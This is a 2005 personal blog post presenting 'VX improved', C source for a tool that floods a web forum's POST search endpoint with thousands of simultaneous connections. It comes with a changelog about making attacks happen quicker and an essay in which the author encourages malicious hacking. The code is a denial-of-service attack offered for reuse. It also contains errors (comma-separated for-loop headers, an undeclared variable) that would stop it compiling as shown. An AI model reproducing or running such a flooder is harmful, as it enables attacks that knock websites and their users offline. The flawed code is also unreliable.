VX improved

Published 10.10.2005 by jm | E-mail this post

This is the latest evolution of the VX series. The original can be seen here.
Web log:
Future: possibly just make connections? Attempt to make a "GET" version
October 14,2005: Added a socketfd array, so that more connections are made, and more attacks happen quicker. Made the headerinfo variable a character array instead of a pointer, to save on initialization time. This is less efficient in the shortrun, but more efficient in the long run.
October 1, 2005: Removed about 10 more lines of unnecesary IF statements out of the loop. At this point, the VX program can run against anything that uses the "POST" uri on a website.
July, 31, 2005: Unveiled the VX Series. This version only works with a forum's search function.

Note: If connections are refused after a certain amount of iternations, you may want to change the array size of "int socketfd" from 10,000 to 100 or so. You may want to put printf statments outside of the for loops, so you don't think the program has crashed.

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdlib.h>
#include <time.h>

int main()
{
int sockfd[10000], portno = 80, x=1,i;
struct sockaddr_in serv_addr;
struct hostent *server;
char headerinfo[3000];
char *mystring="helloworld";
server = gethostbyname("example.com");

while(1)
{
++x;
//------------- ethereal sniff paste goes here -------------
sprintf(headerinfo,"POST /phpBB/search.php?
mode=results&sid=0ab21201ef943af7bb15cd19176c362d HTTP/1.1\r\n"
"Host: www.example.com\r\n"
"User-Agent: Netscape/2.0 (MacOS; U; MacOS 10; en-US; rv:1.7.8) Gecko/20050511 Netscape/6.2.2\r\n"
"Accept: text/xml,application/xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"
"Accept-Language: en-us,en;q=0.5\r\n" "Accept-Encoding: gzip,deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Keep-Alive: 3300\r\n" "Connection: keep-alive\r\n"
"Referer: http://www.example.com/phpBB/search.php\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: 281\r\n\r\n"
"search_keywords=%s%d",searchstring,x);
//--------------- end ethereal sniff paste ----------------
serv_addr.sin_addr = *((struct in_addr *)server->h_addr);
serv_addr.sin_port = htons(portno);
serv_addr.sin_family = AF_INET;

for(i=0,i<10000;i++)
if((sockfd[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
for(i=0,i<10000;i++)
connect(sockfd[i], (struct sockaddr *)&serv_addr, sizeof(struct sockaddr));
for(i=0,i<10000;i++)
write(sockfd[i],headerinfo,strlen(headerinfo));
for(i=0,i<10000;i++)
close(sockfd[i]);
write(1, ".", 1);
}
return 0;
}

If the human body was never exposed to ailments, it would be impressivly vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressivly vulnerable to cyber terrorism. With out the creation of a malicious hacking, Afganistan could have destroyed America's economy with a ping flood. This is why I encourange maclicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lay. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere . However if you are a publisher, I would appriciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagerize then that is my biggest compliment . If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age .

Previous hacks

Previous Hacks

This link kills spam

spam IP addresses

Cost of the War in Iraq

(JavaScript Error)

Two very recommended books:

. . The only hacking forum I have found worth mentioning here